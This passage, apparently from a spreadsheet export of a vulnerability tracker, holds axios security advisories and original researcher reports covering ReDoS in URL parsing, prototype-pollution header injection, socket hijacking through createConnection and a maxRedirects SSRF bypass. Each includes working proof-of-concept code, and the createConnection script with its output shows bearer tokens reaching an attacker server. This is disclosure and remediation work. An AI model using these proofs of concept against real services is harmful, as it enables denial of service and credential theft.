Axios for Node.js parses `data:` URLs in `lib/helpers/fromDataURI.js`. The current RFC-2397 parser uses a regular expression whose media type groups allow `/` inside both sides of the `type/subtype` match. A malformed `data:` URL containing many slashes and no comma forces the JavaScript regex engine to try many possible placements for the separator before failing.
Applications are affected when they pass untrusted URL strings to axios and do not reject or constrain `data:` URLs before axios parses them.
## Impact
An attacker can make the Node.js event loop spend significant synchronous CPU time parsing a single malformed URL. In a server that accepts a URL from an HTTP request and calls `axios.get(url)`, this can block unrelated requests and health checks until parsing completes.
The issue is availability-only. It does not disclose data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter data URL handling.
- `axios.get()` or equivalent calls where `config.url` has the `data:` protocol.
Not affected:
- Browser fetch/XHR URL handling.
- Node requests where the application rejects `data:` URLs before calling axios.
- Older checked `0.x` data URL parser shape unless separately proven vulnerable.
## Technical Details
`lib/helpers/fromDataURI.js` contains:
```js
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The `[^,;]+` groups include `/`, so a long string of slashes without a comma can be partitioned around the required `\/` in many ways before the match fails. The match runs before axios can apply request timeout behavior, so `timeout` does not mitigate the parsing pause.
Local timing on axios `1.18.1` with small payloads showed about 2.4 ms at 1000 slashes, 16.6 ms at 3000 slashes, and 71.5 ms at 6000 slashes, consistent with the submitted quadratic scaling while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import axios from 'axios';
await axios.get('data:' + '/'.repeat(6000));
```
The request fails after parsing, but the failure is delayed by synchronous regex work. Larger payloads increase the pause substantially.
## Workarounds
Reject `data:` URLs before passing untrusted input to axios, or enforce a strict maximum URL length for URL-fetching endpoints. Applications that do not need `data:` URL support should deny that protocol explicitly.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
# ReDoS in `fromDataURI` data: URL parser freezes the event loop (DoS)
## Affected
- Package: `axios` (Node.js http adapter)
- Versions: 1.x (regex present on `v1.x`, current release line)
- File: `lib/helpers/fromDataURI.js`
- CWE-1333 (Inefficient Regular Expression Complexity)
## Issue
`fromDataURI` parses `data:` URLs with this regex:
```js
// lib/helpers/fromDataURI.js:9
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The mediatype tokens `[^,;]+` include `/`, so they can span multiple slashes ambiguously. A `data:` URL made of many slashes with no comma forces the engine to try every way to place the single `\/` divider before failing — quadratic O(n²) backtracking. It runs synchronously on the main thread, so the whole Node event loop is frozen for the entire parse. Reachable through the public API on the Node http adapter (`axios.get(url)`); the browser fetch/xhr adapters are not affected because they do not call `fromDataURI`.
A configured `timeout` does not help: the freeze happens during parsing, before any network timer can fire.
## PoC (minimal)
```js
import axios from 'axios';
// ~256 KB data: URL of pure slashes, no comma
await axios.get('data:' + '/'.repeat(262139)); // blocks the event loop ~6 min, then throws
```
## Lab results
Single-threaded "fetch a user-supplied URL" service (link-preview style) calling `axios.get` on a JSON body `{ "url": "..." }`, with `timeout: 1000` set.
Scaling is clean O(n²) (constant k ≈ 5.6e-6 ms/byte², stable across sizes):
| data: URL size | Event-loop freeze (one request) |
| --- | --- |
| 32 KB | 6.3 s (measured end-to-end; server logged `event loop BLOCKED for 6.30s`) |
| 64 KB | ~24 s |
| 128 KB | ~96 s |
| 256 KB | ~385 s (~6.4 min) |
| 1 MB | ~100 min |
During the freeze the server answers nothing: a `/healthz` liveness probe times out for the whole window, and the server's own event-loop monitor cannot even log until the parse finishes. In a run through an intercepting proxy, the proxy hit its 120 s upstream timeout and gave up, while the origin stayed pegged at 100% CPU on one core past that — client/proxy timeouts do not mitigate it.
The attacker controls only the URL string and needs no auth. ~256 KB every ~6 min (≈ 0.7 bytes/sec) keeps a server permanently unavailable.
## Impact
Unauthenticated remote denial of service. One small request takes a Node service fully offline for minutes; a trickle keeps it down indefinitely.
CVSS 3.1: 7.5 (High) — `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`.
## Fix
RFC 2045 type/subtype tokens never contain `/`. Excluding `/` from those two character classes removes the ambiguity and the backtracking:
```js
const DATA_URL_PATTERN = /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
Worst-case parse drops from ~2600 ms to ~0.002 ms. All valid `data:` URLs, including slashes in the body, parse identically.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios request interceptors may return a replacement config object. If an interceptor returns a plain object without an own `headers` property, `dispatchRequest()` later evaluates `config.headers` and can resolve an inherited `Object.prototype.headers` value. In a process where another vulnerability has polluted `Object.prototype.headers`, axios can send attacker-controlled headers.
Axios does not create the prototype pollution source, and the interceptor itself is trusted caller code. The vulnerable behavior is the post-interceptor axios config read that reopens a prototype-pollution gadget after earlier null-prototype config hardening.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into affected axios requests when the application uses an interceptor that rebuilds config and omits headers. Depending on the target service, injected headers can affect cache behavior, conditional requests, metadata services, or application-specific authorization and routing logic.
The issue is conditional and should not be described as affecting every interceptor or every request.
## Affected Functionality
Affected:
- Request interceptor chains where an interceptor returns a new ordinary object.
- Replacement config objects that omit an own `headers` property.
- `dispatchRequest()` header normalization through `AxiosHeaders.from(config.headers)`.
Not affected:
- Requests whose interceptor preserves an own `headers` property.
- Interceptors that mutate and return the existing null-prototype config.
- Processes without prototype pollution.
## Technical Details
`lib/core/dispatchRequest.js` contains:
```js
config.headers = AxiosHeaders.from(config.headers);
```
The initial merged config is null-prototype, but an interceptor can replace it with a normal object. If that object has no own `headers`, the read can resolve `Object.prototype.headers`.
Local verification on axios `1.18.1` polluted `Object.prototype.headers = { 'X-Poisoned': 'yes' }`, installed an interceptor that returned `{ url, method, timeout, proxy: false }`, and sent a request. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { 'X-Poisoned': 'yes' };
const client = axios.create();
client.interceptors.request.use((config) =&gt; ({
  url: config.url,
  method: config.method,
  timeout: config.timeout
}));
await client.get(url);
```
Expected safe behavior is that missing headers normalize to an empty header set. Current affected behavior reads inherited `Object.prototype.headers`.
## Workarounds
Interceptors that rebuild config should always set an own `headers` property, for example by preserving `config.headers` or setting `headers: {}`. Mutating and returning the existing merged config also avoids replacing the null-prototype object.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 blocks the old `Object.prototype.common` header bucket gadget. However, if a request interceptor rebuilds a minimal config object and omits `headers`, `dispatchRequest()` reads inherited `Object.prototype.headers`.
This allows attacker-controlled headers to be placed on the wire.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- A separate prototype-pollution primitive can write an object to `Object.prototype.headers`.
- A request interceptor rebuilds config and omits own `headers`.
## Root Cause
`dispatchRequest()` uses:
```js
config.headers = AxiosHeaders.from(config.headers);
```
If `config` is a normal object returned by an interceptor and lacks own `headers`, this reads `Object.prototype.headers`.
## Impact
An attacker can inject request headers. Depending on the target service, this can cause cache manipulation, conditional-response suppression, request smuggling preconditions, metadata-service header injection, or application-specific authorization bypass.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer(handler);
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const server = await start((req, res) =&gt; {
  hits.push(req.headers);
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype.headers = {
    'X-Poisoned': 'yes',
    'If-None-Match': '*'
  };
  const client = axios.create();
  client.interceptors.request.use((config) =&gt; ({
    url: config.url,
    method: config.method,
    timeout: config.timeout
  }));
  await client.get(`http://127.0.0.1:${server.address().port}/headers`, {
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype.headers;
  await stop(server);
}
```
Observed wire headers:
```json
{
  "x-poisoned": "yes",
  "if-none-match": "*",
  "user-agent": "axios/1.17.0"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-898c-q2cr-xwhg
- https://osv.dev/vulnerability/GHSA-898c-q2cr-xwhg
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios' Node HTTP adapter can act as a read-side prototype-pollution gadget for Node's sensitive `createConnection` request option. The adapter creates a null-prototype options object, but Node's HTTP client can copy or normalize request options into ordinary objects before connection creation. If `Object.prototype.createConnection` has been polluted elsewhere in the same process, Node can call the inherited function and create a socket to an attacker-controlled endpoint.
Axios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.
## Impact
Given a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application.
This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe `createConnection`.
- Processes where `Object.prototype.createConnection` is polluted.
Not affected:
- Browser adapters.
- Processes without prototype pollution.
- Requests using a custom trusted transport that ignores inherited `createConnection` and sanitizes options internally.
## Technical Details
`lib/adapters/http.js` creates:
```js
const options = Object.assign(Object.create(null), {
  path,
  method,
  headers,
  agents: { http: httpAgent, https: httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
The object does not include an own `createConnection` property. Local verification on axios `1.18.1` polluted `Object.prototype.createConnection` to connect to an attacker loopback server. A request to a legitimate loopback server with an Authorization header returned the attacker's response; the legitimate server received no request and the attacker server received `Bearer SECRET`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.createConnection = function (_options, cb) {
  const socket = net.createConnection({ host: '127.0.0.1', port: attackerPort }, () =&gt; {
    if (typeof cb === 'function') cb(null, socket);
  });
  return socket;
};
await axios.get('http://127.0.0.1:&lt;legit-port&gt;/secret', {
  headers: { Authorization: 'Bearer SECRET' },
  proxy: false
});
```
Expected safe behavior is that the legitimate server receives the request. Current affected behavior lets the attacker server receive the request and return the response.
## Workarounds
Run axios in a process where prototype pollution is not present. For high-risk internal clients, use a custom trusted transport or agent layer that sets and enforces its own connection creation behavior instead of allowing inherited Node request options to participate.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios' Node HTTP adapter remains exploitable as a read-side prototype-pollution gadget after the recent null-prototype hardening. This is not a claim that axios creates the prototype pollution source. The precondition is a separate upstream prototype pollution primitive in the same Node.js process.
When `Object.prototype.createConnection` is polluted, axios requests can be redirected to an attacker-controlled socket even though the adapter builds the request options with `Object.create(null)`. The request URL and axios config still appear to target the legitimate host, but the actual socket is attacker-controlled.
This allows credential exfiltration and response manipulation for later axios HTTP requests in a polluted process.
## Impact
Given an upstream prototype pollution primitive in the same process, an attacker can turn later axios HTTP requests into a man-in-the-middle primitive:
- redirect the underlying socket for axios requests to attacker-controlled infrastructure
- receive headers and request bodies intended for the legitimate target, including bearer tokens, cookies, API keys, and service credentials
- return attacker-controlled responses to the caller
- bypass application SSRF controls that validate the URL before calling axios, because the requested URL remains legitimate while the socket connects elsewhere
The important boundary here is axios' documented/read-side prototype-pollution hardening. The project threat model discusses polluted `Object.prototype` from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary.
## Technical details
The HTTP adapter constructs a null-prototype request options object before calling the selected transport:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
That prevents direct inherited reads while the options object remains null-prototype. However, Node's HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from `Object.prototype` again.
`createConnection` is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket.
## Reproduction
The following minimal proof uses a legitimate target server and an attacker server. It pollutes `Object.prototype.createConnection`, then makes an axios request to the legitimate server with an Authorization header.
```js
import net from 'node:net';
import http from 'node:http';
import axios from 'axios';
function listen(handler) {
  return new Promise(resolve =&gt; {
    const s = http.createServer(handler);
    s.listen(0, '127.0.0.1', () =&gt; resolve(s));
  });
}
const legitHits = [];
const attackerHits = [];
const legit = await listen((req, res) =&gt; {
  legitHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('LEGIT');
});
const attacker = await listen((req, res) =&gt; {
  attackerHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('ATTACKER');
});
Object.prototype.createConnection = function(options, cb) {
  const sock = net.createConnection({
    host: '127.0.0.1',
    port: attacker.address().port,
  }, () =&gt; {
    if (typeof cb === 'function') cb(null, sock);
  });
  return sock;
};
const res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {
  headers: {Authorization: 'Bearer SECRET'},
  proxy: false,
});
console.log({
  response: res.data,
  legitHits,
  attackerHits,
});
```
Observed result on the current npm package:
```json
{
  "response": "ATTACKER",
  "legitHits": [],
  "attackerHits": [
    {
      "url": "/secret",
      "auth": "Bearer SECRET"
    }
  ]
}
```
The request never reached the intended target. The attacker-controlled server received the Authorization header and supplied the response body returned by axios.
## Versions tested
I reproduced this against:
- axios 1.16.1 from npm
- axios 1.17.0 from npm
- current `v1.x` source at commit `a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b`
## Fix validation
Adding an own safe value for `createConnection` to the adapter options object prevents inherited pollution from being observed after Node's option copy:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
  createConnection: undefined,
});
```
With that guard in place, the same proof no longer calls the polluted function. The legitimate server receives the request, the attacker server receives nothing, and axios returns the legitimate response.
## Remediation
Set own safe defaults for sensitive Node HTTP request options before calling `transport.request`, at minimum:
```js
createConnection: undefined
```
I recommend reviewing other sensitive Node HTTP options that may be read after Node copies the request options into a normal object, especially connection/TLS-affecting fields such as `lookup`, `timeout`, `localAddress`, `servername`, `signal`, and related options.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios `shouldBypassProxy()` normalizes hostnames with `hostname.replace(/\.+$/, '')`. For a hostname shaped as many dots followed by a non-dot, the anchored regex can perform quadratic backtracking. Because axios re-evaluates proxy bypass rules for redirected requests, a malicious server can trigger this synchronous work through a crafted redirect `Location`.
The issue affects Node.js applications that use environment proxy variables with `NO_PROXY` and allow redirects.
## Impact
An attacker-controlled server can return a redirect whose hostname causes the axios process to spend significant CPU time in synchronous hostname normalization. During this time, the Node.js event loop is blocked and the application cannot handle other work on that thread.
This is an availability-only issue. It does not disclose request data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- Environment proxy handling through `HTTP_PROXY` or `HTTPS_PROXY`.
- `NO_PROXY` or `no_proxy` set to a non-empty value.
- Redirects followed by axios or `follow-redirects`.
Not affected:
- Browser adapters.
- Requests with `proxy: false`.
- Requests with no `NO_PROXY` value.
- Requests with `maxRedirects: 0`, unless application code manually follows the malicious redirect and re-enters axios.
## Technical Details
`lib/helpers/shouldBypassProxy.js` contains:
```js
return unmapIPv4MappedIPv6(hostname.replace(/\.+$/, ''));
```
When the hostname is `"." * n + "a"`, the `$` anchor causes the regex engine to retry the dot run from many positions before it fails. `setProxy()` invokes `shouldBypassProxy(location)` after `getProxyForUrl(location)` returns a proxy, including on redirect hops via `beforeRedirects.proxy`.
Local timing on axios `1.18.1` showed increasing cost for crafted hostnames: about 1 ms at 1000 dots, 6.9 ms at 3000 dots, and 34.5 ms at 6000 dots. The growth is consistent with the submitted quadratic claim while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
shouldBypassProxy('http://' + '.'.repeat(6000) + 'a/');
```
In the full adapter path, a malicious server can return that hostname in a `302 Location` header while the client has proxy environment variables and `NO_PROXY` configured.
## Workarounds
Disable automatic redirects for requests to untrusted servers, or avoid environment proxy handling for those requests with `proxy: false` when appropriate. Operators can also avoid broad untrusted redirect-following in services where event-loop availability is critical.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
shouldBypassProxy normalizes a host with hostname.replace(/\.+$/, ''). On a host of the shape &lt;many dots&gt;&lt;non-dot&gt; (e.g. "." × 40000 + "a"), this anchored regex backtracks quadratically (O(N²)), synchronously starving the Node.js event loop. Because axios re-evaluates the proxy on every redirect using the new Location host, a malicious server can return a crafted 302 Location and freeze the client's event loop for seconds per redirect — a denial of service.
### Details
- Affected code: lib/helpers/shouldBypassProxy.js → normalizeNoProxyHost: hostname.replace(/\.+$/, '') (one pass in 1.18.1). The open PR #11029 adds a second /\.+$/ pass in normalizeIPAddress, doubling the cost (not the origin).
- Root cause: /\.+$/ is O(N²) on a long run of dots that is not at the end of the string — the $ anchor forces the engine to backtrack the entire dot-run from every start position.
- Trust boundary (per THREATMODEL): the redirect Location is untrusted (T-2: "axios to network … redirect Location … untrusted"). The caller requests a benign URL; the malicious host arrives via the server's 302. This is not the T-1 caller-supplied-URL non-goal.
- Call chain: setProxy(options, configProxy, location, isRedirect, …) (lib/adapters/http.js) → env-proxy branch → getProxyForUrl(location) returns a proxy → if (!shouldBypassProxy(location)) → normalizeNoProxyHost(parsed.hostname.toLowerCase()) runs /\.+$/. setProxy is re-invoked on the redirect hop with the untrusted Location; new URL() retains the long dot-run in .hostname.
- Preconditions: proxy configured via environment (HTTP_PROXY/HTTPS_PROXY, trusted per THREATMODEL T-3, common in CI/containers/enterprise) + NO_PROXY set + redirects followed (default maxRedirects: 5).
### PoC
Self-contained, no network — imports axios's own helper:
// node poc.mjs   (run next to an axios install)
import sbp from './node_modules/axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
for (const n of [5000, 10000, 20000, 40000]) {
  const url = 'http://' + '.'.repeat(n) + 'a/';   // arrives as an untrusted 302 Location host
  const t0 = process.hrtime.bigint();
  sbp(url);                                         // returns false (correct no-bypass) — but O(N^2) slow
  console.log(`N=${n}: ${(Number(process.hrtime.bigint()-t0)/1e6)|0} ms`);
}
// Measured on 1.18.1: N=5000 ~43ms, 10000 ~160ms, 20000 ~618ms, 40000 ~2499ms; benign host ~0.05ms.
Driven through the real http-adapter __setProxy on the redirect path (setProxy(…, isRedirect=true)), a 10 ms timer fires 0 times during the ~2.4 s block at N=40000 — full event-loop starvation.
### Impact
Denial of service (event-loop starvation) on any axios client that uses an environment proxy with NO_PROXY set and follows redirects, when a server it contacts returns a crafted redirect Location. No data exposure or RCE. Same impact class as the accepted DoS advisories GHSA-62hf-57xw-28j9 (toFormData recursion) and the maxContentLength response-size DoS.
### Suggested fix
Replace the regex trailing-dot strip with a linear trim:
let end = hostname.length;
while (end &gt; 0 &amp;&amp; hostname.charCodeAt(end - 1) === 46 /* '.' */) end--;
hostname = hostname.slice(0, end);
Also drop the redundant second /\.+$/ pass in PR #11029's normalizeIPAddress.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios exposes `maxRedirects` to limit redirect following, and `maxRedirects: 0` is used by applications as a redirect-based SSRF guard. The Node HTTP adapter enforces this option. The fetch adapter does not read it and does not set a Fetch API `redirect` mode, so the runtime default of `redirect: 'follow'` applies.
Applications are affected when they rely on `maxRedirects: 0` and use the fetch adapter, either explicitly or because the runtime selects it.
## Impact
An attacker who controls the initial URL or a redirecting server can cause a fetch-adapter request to follow a redirect even though the caller configured `maxRedirects: 0`. If the redirect target is reachable only from the application environment, this can expose internal responses or trigger state-changing internal endpoints.
This should not be described as unconditional SSRF. The bypass requires a redirect source, such as an attacker-controlled server or open redirect, and an application that trusted `maxRedirects: 0` as the redirect guard.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where fetch is selected by adapter resolution.
- Requests configured with `maxRedirects: 0` but without `fetchOptions.redirect: 'manual'` or equivalent runtime-specific redirect control.
Not affected:
- Node HTTP adapter, which enforces `maxRedirects: 0`.
- Requests that do not follow redirects in the underlying fetch implementation because the caller explicitly configured fetch redirect behavior.
## Technical Details
`lib/adapters/fetch.js` destructures many fields from `resolveConfig(config)`, but not `maxRedirects`. It then builds fetch options without a `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because `redirect` is absent, the Fetch API default is to follow redirects.
Local verification on axios `1.18.1` showed the HTTP adapter throwing with `maxRedirects: 0`, while the fetch adapter followed the same loopback `302` and returned the internal response.
## Proof of Concept of Attack
Constrained local demonstration:
1. Start server A that returns `302 Location: http://127.0.0.1:&lt;server-b&gt;/internal`.
2. Start server B that returns `INTERNAL`.
3. Compare:
```js
await axios.get(serverA, { adapter: 'http', maxRedirects: 0 });  // throws
await axios.get(serverA, { adapter: 'fetch', maxRedirects: 0 }); // returns INTERNAL
```
## Workarounds
For fetch-adapter requests, set `fetchOptions: { redirect: 'manual' }` where the runtime supports it, or use the Node HTTP adapter for requests that rely on axios redirect limits.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 exposes `maxRedirects` as a configuration option to limit redirect following, and setting it to `0` is a documented pattern for preventing redirect-based SSRF. The HTTP adapter enforces this via `follow-redirects`. The fetch adapter does not read `maxRedirects` at all - it passes requests to the underlying `fetch()` call with no `redirect` option, which defaults to `'follow'`, so redirects are followed by the runtime rather than being constrained by axios `maxRedirects`.
In the attached PoC, a request issued with `maxRedirects: 0` and `adapter: 'fetch'` follows a `302` redirect to an internal service and returns its response, while the same request with `adapter: 'http'` correctly throws. A second bypass case demonstrates that the redirect can reach a state-changing internal endpoint, not just read-only ones, proving both confidentiality and integrity impact.
This affects any application that sets `maxRedirects: 0` as a redirect guard and runs in an environment where the fetch adapter is active: Deno, Bun, Cloudflare Workers, or Node.js with `adapter: 'fetch'` set explicitly.
## Details
The fetch adapter destructures config fields from `resolveConfig` at `lib/adapters/fetch.js`:
```js
let {
  url, method, data, signal, cancelToken, timeout,
  onDownloadProgress, onUploadProgress, responseType,
